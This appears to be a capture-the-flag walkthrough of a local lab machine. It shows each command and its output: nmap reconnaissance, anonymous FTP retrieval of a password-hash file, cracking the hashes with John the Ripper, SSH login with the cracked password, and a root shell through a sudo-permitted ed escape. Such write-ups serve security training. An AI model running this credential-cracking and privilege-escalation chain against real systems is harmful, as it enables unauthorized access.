We first start off with an nmap scan of the remote host.
root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.104 Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-19 11:47 MST Nmap scan report for 192.168.56.104 Host is up (0.00046s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp pyftpdlib 1.5.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 root root 1062 Jul 29 00:00 backup | ftp-syst: | STAT: | FTP server status: | Connected to: 192.168.56.104:21 | Waiting for username. | TYPE: ASCII; STRUcture: File; MODE: Stream | Data connection closed. |_End of status. 22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0) | ssh-hostkey: | 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA) | 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA) |_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (EdDSA) MAC Address: 08:00:27:13:81:5A (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds root@ubuntu:~/src#
NMAP came back with two ports open 21 and 22. Lets connect to ftp and see what we can find there.
root@ubuntu:~# ftp 192.168.56.104 Connected to 192.168.56.104. 220 pyftpdlib 1.5.5 ready. Name (192.168.56.104:root): anonymous 331 Username ok, send password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 Active data connection established. 125 Data connection already open. Transfer starting. -rw-r--r-- 1 root root 1062 Jul 29 00:00 backup 226 Transfer complete. ftp>
We see there is one file that we can download called 'backup'. Lets download the file and see what is contains. After we downloaded the 'backup' file we cat its contents.
root@ubuntu:~/src# cat backup CREDENTIALS: office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X. datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/ sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0 sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/ space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/ root@ubuntu:~/src#
It looks like some user names and password hashes lets fire up john and start cracking
root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/sunset-hash.txt --format=sha512crypt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status space (space) cheer14 (sunset) 2g 0:00:00:13 DONE (2019-11-19 11:58) 0.1484g/s 1064p/s 1862c/s 1862C/s gerber..chanda Use the "--show" option to display all of the cracked passwords reliably Session completed root@ubuntu:~/src/JohnTheRipper/run#
We cracked two of the hashes we found our next step is to try and login to ssh with the following user names and passwords.
root@ubuntu:~/src# ssh sunset@192.168.56.104 The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established. ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts. sunset@192.168.56.104's password: Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182 sunset@sunset:~$
We got a successful login with 'sunset' using the password 'cheer14' lets now check sudo rights of the user.
sunset@sunset:~$ sudo -l Matching Defaults entries for sunset on sunset: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User sunset may run the following commands on sunset: (root) NOPASSWD: /usr/bin/ed sunset@sunset:~$
We can run the ed editor with no password. We can ofcourse break out in to a shell with the ed program by specifying the commmand '! /bin/bash' inside the editor.
sunset@sunset:~$ sudo /usr/bin/ed ! /bin/bash root@sunset:/home/sunset# id uid=0(root) gid=0(root) groups=0(root) root@sunset:/home/sunset# whoami root root@sunset:/home/sunset#
We broke out in to a root shell now all thats left to do is cat the flag located in /root.
root@sunset:/home/sunset# cd /root root@sunset:~# ls flag.txt ftp server.sh root@sunset:~# cat flag.txt 25d7ce0ee3cbf71efbac61f85d0c14fe root@sunset:~#
No comments:
Post a Comment